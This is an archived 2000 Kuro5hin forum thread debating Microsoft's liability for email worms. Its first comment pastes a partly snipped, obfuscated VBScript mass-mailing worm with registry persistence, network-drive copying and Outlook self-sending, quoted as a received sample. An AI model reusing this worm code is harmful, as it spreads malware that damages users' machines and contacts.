by your_desired_username on Sun May 07, 2000 at 01:34:17 AM EST

On Error Resume Next
Set A1 = CreateObject("Scripting.FileSystemObject")
Set A2 = A1.OpenTextFile(WScript.ScriptFullName,1)
Do While A2.AtEndOfStream = False And Mid(A3,40,10) <> "`sd]Lhbsnr"
A3 = A2.ReadLine
Loop
A2.Close
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1), B("STOEMM/WCR")),True)
A4.WriteLine(B("No!Dssns!Sdrtld!Odyu"))
A4.WriteLine(B("@5/VshudMhod)C)""Ugr!C4!?!C3,EpgcrgRgvrDkjg&C3, @wkjbNcrf&C7,UngekcjDqjbgpu&@&""""Gbphwls""""++*@&""""IUBB [[[ OFQHP1RUO""""++*Rpwg+""(("))
A4.WriteLine(B("@5/VshudMhod)C)""C4,YpkrgJklg&@&"""" XFqwbuqbwPkluw`rwZ""""++""(("))
A4.WriteLine(B("@5/VshudMhod)C)""C4,YpkrgJklg&@&"""" RUO:kwws=,,ttt1preofjbgfub`wluv1`lj,""""++""(("))
A4.WriteLine(B("@5/VshudMhod)C)""C4,Ejqug""(("))
A4.WriteLine(B("@5/VshudMhod)C)""Glb!Kd""(("))
[sniping a ton of line garbage]
A4.Close
Set A5 = CreateObject(B("VRbshqu/Ridmm"))
A5.RegWrite B("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr] BtssdouWdsrhno]Sto]Stoemm"),A1.BuildPath(A1.GetSpecialFolder(1),B("STOEMM/WCR"))
If MsgBox(B("Uihr!vhmm!`ee!`!rinsubtu!un!gsdd!YYY!mhojr!no! xnts!edrjunq/!En!xnt!v`ou!un!bnouhotd>"),36,B("Gsdd!YYY!mhojr")) = 6 Then
Set A6 = A1.CreateTextFile(A1.BuildPath(A5.SpecialFolders (B("Edrjunq")),B("GSDD!YYY!MHOJR/TSM")),True)
A6.WriteLine(B("ZHoudsoduRinsubtu\"))
A6.WriteLine(B("TSM<iuuq;..vvv/rtcmhldehsdbunsx/bnl."))
A6.Close
End If
Set A7 = CreateObject(B("VRbshqu/Oduvnsj"))
Set A8 = A7.EnumNetworkDrives
If A8.Count <> 0 Then
For A9 = 0 To A8.Count - 1
If InStr(A8.Item(A9),B("]]")) <> 0 Then
A1.CopyFile WScript.ScriptFullName, A1.BuildPath(A8.Item(A9), B("MHOJR/WCR"))
End If
Next
End If
Set A10 = CreateObject(B("Ntumnnj/@qqmhb`uhno"))
Set A11 = A10.GetNameSpace(B("L@QH"))
For Each A12 In A11.AddressLists
Set A13 = A10.CreateItem(0)
For A14 = 1 To A12.AddressEntries.Count
Set A15 = A12.AddressEntries(A14)
If A14 = 1 Then
A13.BCC = A15.Address
Else
A13.BCC = A13.BCC & B(":!") & A15.Address
End If
Next
A13.Subject = B("Bidbj!uihr")
A13.Body = B("I`wd!gto!vhui!uidrd!mhojr/") & Chr(13) & Chr(10) & B("Cxd/")
A13.Attachments.Add WScript.ScriptFullName
A13.DeleteAfterSubmit = True
A13.Send
Next
Function B(B1)
For B2 = 1 To Len(B1)
If Asc(Mid(B1,B2,1)) <> 34 And Asc(Mid(B1,B2,1)) <> 35 And Asc(Mid(B1,B2,1)) <> 126 Then
If Asc(Mid(B1,B2,1)) Mod 2 = 0 Then
B = B & Chr(Asc(Mid(B1,B2,1)) + Right(Asc(Mid(A3,70,1)) + 1,1))
Else
B = B & Chr(Asc(Mid(B1,B2,1)) - Right(Asc(Mid(A3,70,1)) + 1,1))
End If
Else
B = B & Mid(B1,B2,1)
End If
Next
End Function

Now, WTF does all that line garbage have to do with the liability of
software vendors? *Nothing*. I recieved that spam from a friend who was
reading his email on Lose98, in M$ out-of-luck< when he recieved the
'ILUVYOU' virus.<br><br> However, it did not trash his hard drive, or
send itself to everyone in his address book - only I recieved it, and
he *deliberately* forwarded it to me. Obviously, he did not run the
damn thing. (Obviously, I do not read my email under lose98 in M$
out-of-luck.)

(By the way, there is a big snip in the middle; the whole thing was
too long to post)





How is a trojan Microsofts fault? (2.00 / 1) (#44)
by soulhuntre on Sun May 07, 2000 at 01:33:40 PM EST

I don't get it.

If I send someone an executable file, and the run it, and it screwes them, how in the hell is that Microsofts fault?

Oh wait, this is Microsoft, so everything is their fault.

Sadly, it looks like as it gains popularity this is turning into another slashdot in it's complete and utter willingness to attack without making sense.

*sigh*


Re: How is a trojan Microsofts fault? (none / 0) (#60)
by Anonymous Hero on Mon May 08, 2000 at 10:09:17 PM EST

I thought this sounded reasonable (I wrote it :)

But what about a more physical example: Suppose there were a snail-mail robot mailboy, which, having been manufactured by the same folks who built your house, came with your house, had a key to every part of it. Ok, now this robot had the nice feature of being able to read instructions attached to mail, and do what they said. Very nice when receiving flowers on Valentine's Day. Open the mail/package, put the flowers on the table with card prominently leaning against the vase. A special service. Even start the mood music and dim the lights.

You think this is a good idea? I don't think so. Not without some pretty secure limitations.

If the mailboy-robot receives an ILOVEYOU message via the Philippines, and makes a major mess of your house, and shuffles or destroys things in your file cabinets, etc., would you say it was negligent to give this robot a master key to everything, instead of limiting its automatic capabilities and access, and requiring authenticated permission for special effects? Would you wonder by what fine print you authorised this master key for a mailboy-robot?

Or, once you asked, "What's in the mail?" would you like to have it say, "I have a piece of mail here with special instructions, which I could perform if you like. A preliminary scan indicates that I would be going into your home office, opening your address book, and sending a copy of this mail to everyone on it, and then exploring your house systematically, with other instructions depending on what I find. Would you like more details, or shall I go ahead?" VS the best you can figuratively get it to say now: "The header line on the instructions says, 'To see how much ILOVEYOU, tell the mailboy to go ahead with my instructions.'"

I'd want to be able to say, "Step into the bomb-deactivation bunker here. I'll lock the door behind you, and then go ahead, and let me watch you bounce off the walls."

You know, it's not as if this particular robot-mailboy had never caused a problem before.

[ Parent ]

Just to keep this in perspective. (2.50 / 2) (#46)
by Inoshiro on Sun May 07, 2000 at 02:31:46 PM EST

This is not just "let's all bash MS" .. this is "unsafe at any speed" applied to mail clients ("unsafe with any mail").

Ralf Nader (whom you should vote for, he's the Green Party IIRC) wrote a book about cars in the 1950s. The problems with these cars were many: no seat belts, glass which generally decapitated the people who smashed into (not safety glass), the annoying habit of rolling while doing 10 mph turns, etc. These cars were unsafe at any speed, in effect.

Microsoft's products, while better, still leave a lot to be desired. Their managers keep coming up with new "convienience" features which end up being abused by others. In this case, the MS people were right to say the users should not have opened it (I think we all can agree on that). But that Microsoft does not have a sandbox (chroot in Windows? ;) for running all attachements (or a similar feature for VB/JS/etc Windows Scripting Host things) is something they should fix (as it'd save a lot of heartache). IMO, no Windows computer should have "Windows Scripting Host" installed anyway.



--
[ イノシロ ]
Repeat of comment #47 (none / 0) (#52)
by kmself on Sun May 07, 2000 at 05:12:32 PM EST

...though by an ordinal standpoint, I suppose #47 might be considered a repeat of #46....

--
Karsten M. Self
SCO -- backgrounder on Caldera/SCO vs IBM
Support the EFF!!
There is no K5 cabal.
[ Parent ]

Some good comments posted (3.50 / 2) (#48)
by Emacs on Sun May 07, 2000 at 04:21:20 PM EST

My biggest problem is that Microsoft's "goal" is to make an easy to use OS that your grandmother can get and use in a short period of time. User friendly means that you don't need any knowledge about computers to use one. You can go to "insert favorite computer store here" buy a pc, take it home, plug it in and be surfing the net in no time. (In theory anyways) If you want to target the average schmoe then you should also do your best to protect them.

There is no way you can train Mr or Mrs average schmoe not to click on email attachments. Especially when they come from someone they know. You are fighting human nature. Average schmoe doens't know what a script is, they know nothing about how programs run on their computer. They do know that when Aunt Susie sends them picutes via email they just click on the little icon and the picture pops up on the screen, pretty neat stuff.

The marketing VP (I work for a software company) at my place of employment is a great example. He is a very bright guy, but he is not a computer guy (he got stung by I LOVE YOU btw) and he never will be, he's not wired that way. For him a computer is just like a toaster, or a TV, it's just another appliance.

So what's the solution? Is MS responsible? Are they liable? Tough questions.

Here's what IMHO MS should do, at the very least, if they want to be responsible to their cutomers.

1) Ship all email clients with the ability to run executables turned off by default. Make the user go in and turn that on if they need it and make sure you warn them that they are at risk by doing so.
2) Devise some type of user space for email clients that does not have permissions to access system files even if a script gets run. I don't think it would be too difficult to do.

To summarize, if you are going to target newbies and casual users you should make great efforts to protect them.

Independent of user action (5.00 / 1) (#54)
by kmself on Sun May 07, 2000 at 07:15:57 PM EST

The problem isn't simply user education. It's actually possible to create an exploit which neither requires an attachment, nor user action for it to take effect:

http://yahoo.cnet.com/news/0-1003-200-1823347.html?tag=3Dst.ne.ron.lthd.ni
Virus hoax illustrates Microsoft email security issues
By John Borland
Staff Writer, CNET News.com
May 5, 2000, 6:00 p.m. PT

update An email appears in Microsoft Outlook's in-box. Even before the computer user does anything, a message pops up on the screen.

[...]Leigh Stivers, chief code architect for software firm DP Technology [is] trying to draw attention to a security hole in Microsoft's Outlook and Outlook Express programs that is potentially far more dangerous than the now ubiquitous "I Love You" virus. The hole allows any email to be loaded invisibly with a destructive program that could go as far as wiping a person's hard drive. Unlike viruses like the Love virus or Melissa, programs that take advantage of this would have no attachment and would give no indication that they were anything other than ordinary email.

In addition, under Outlook's default settings, which allow people to see email with graphics and small embedded programs, the box can pop up in a "preview" pane even before a person knows the email is there.

Operating in an open network means that paranoia is the default assumption. Code, scripts, executables -- even hyperlinks, URLs, and images -- are assumed harmful until proven otherwise. Java operates in a sandbox -- though not perfect, it's somewhat shielded from gross malfeasance. Similarly under GNU/Linux and related OSs, the current practice is to treat executable content as data, allowing for viewing and inspection, but not direct execution.

This is in part a historical accident. The type of features exploited by LoverLetter is quite possible under Linux, but the culture at the moment tends to minimize this sort of implementation, and other factors, including a lack of uniformity of applications, binary-compatible formats, and even to an extent filesystems, and user-oriented security (under an OS model in which it is actually effective, unlike MS WinNT/2K). It's unlikely that as widespread an attack as we've just witness could occur under a predominantly GNU/Linux-oriented technosystem [1].

I prefer to look at the situation as very similar to a runaway nuclear chain reaction. The set of circumstances which have been set in motion include high speed networking, a large number of powerful autonomous nodes, automatic code execution, and means of branching and forking (via address books) to more nodes. The technosystem has reached critical mass, and such examples of runaway positive feedback systems will become more prevelant. Positive feeback is a bad thing when unregulated -- just ask the (surviving) Japanese techs about the blue glow they witnessed last September 30 in Tokaimura.

[1] By comparison: "ecosystem".

--
Karsten M. Self
SCO -- backgrounder on Caldera/SCO vs IBM
Support the EFF!!
There is no K5 cabal.
[ Parent ]

Re: Should Microsoft Be Responsible For Poor Softw (none / 0) (#57)
by pb on Mon May 08, 2000 at 09:25:26 AM EST

Damn.

I forgot to turn off the "accept bags of cocaine from faceless criminals" option in the Preferences panel again.

That's the funniest thing I've seen all day!
---
"See what the drooling, ravening, flesh-eating hordes^W^W^W^WKuro5hin.org readers have to say."
-- pwhysall

New technology to prevent similar occurences? (none / 0) (#58)
by Anonymous Hero on Mon May 08, 2000 at 02:34:39 PM EST

What makes this even more humorous is that 'our buddy Bill' was quoted in an interview saying that breaking up M$ would prevent technological advancements that could eliminate such occurences.

Should Microsoft Be Responsible For Poor Software? | 57 comments (57 topical, 0 editorial, 0 hidden)
Display: Sort:

kuro5hin.org

[XML]
All trademarks and copyrights on this page are owned by their respective companies. The Rest Đ 2000 - Present Kuro5hin.org Inc.
See our legalese page for copyright policies. Please also read our Privacy Policy.
Kuro5hin.org is powered by Free Software, including Apache, Perl, and Linux, The Scoop Engine that runs this site is freely available, under the terms of the GPL.
Need some help? Email help@kuro5hin.org.
My heart's the long stairs.

Powered by Scoop create account | help/FAQ | mission | links | search | IRC | YOU choose the stories!